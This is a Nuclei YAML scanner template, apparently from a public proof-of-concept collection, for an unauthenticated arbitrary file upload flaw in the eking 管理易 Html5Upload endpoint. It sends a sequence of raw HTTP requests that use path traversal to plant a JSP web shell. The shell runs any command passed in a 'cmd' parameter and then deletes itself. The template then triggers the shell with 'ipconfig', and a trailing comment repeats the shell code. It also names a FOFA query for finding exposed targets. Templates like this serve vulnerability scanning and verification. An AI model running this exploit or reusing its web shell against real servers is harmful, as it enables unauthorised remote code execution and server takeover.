id: eking-Html5Upload-fileupload
info:
  name: eking 管理易 Html5Upload - 任意文件上传漏洞
  author: leadlife
  severity: critical
  description: eking管理易Html5Upload接口存在任意文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传任意文件，在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
  reference: 
    - https://github.com/wy876/POC/blob/main/eking%E7%AE%A1%E7%90%86%E6%98%93/eking%E7%AE%A1%E7%90%86%E6%98%93Html5Upload%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: app="EKing-管理易"
  tags: eking,fileupload

variables:
    filename: "{{to_lower(rand_base(4))}}"
    date: '{{date_time("%Y/%M/%D")}}'

http:
  - raw:
      - |
        POST /Html5Upload.ihtm HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        comm_type=INIT&sign_id=shell&vp_type=default&file_name=../../shell.jsp&file_size=2048
      
      - |+
        POST /Html5Upload.ihtm HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
        Connection: close

        ------WebKitFormBoundaryj7OlOPiiukkdktZR
        Content-Disposition: form-data; name="comm_type"

        DATA
        ------WebKitFormBoundaryj7OlOPiiukkdktZR
        Content-Disposition: form-data; name="sign_id"

        shell
        ------WebKitFormBoundaryj7OlOPiiukkdktZR
        Content-Disposition: form-data; name="data_inde"

        0
        ------WebKitFormBoundaryj7OlOPiiukkdktZR
        Content-Disposition: form-data; name="data"; filename="chunk1"
        Content-Type: application/octet-stream

        <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        ------WebKitFormBoundaryj7OlOPiiukkdktZR--
        
      - |+
        POST /Html5Upload.ihtm HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        comm_type=END&sign_id=shell&file_name=../../shell.jsp

      - |+
        GET /shell.jsp?cmd=ipconfig HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200

      - type: regex
        part: body_4
        regex:
          - "Windows IP"
        condition: or


# <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>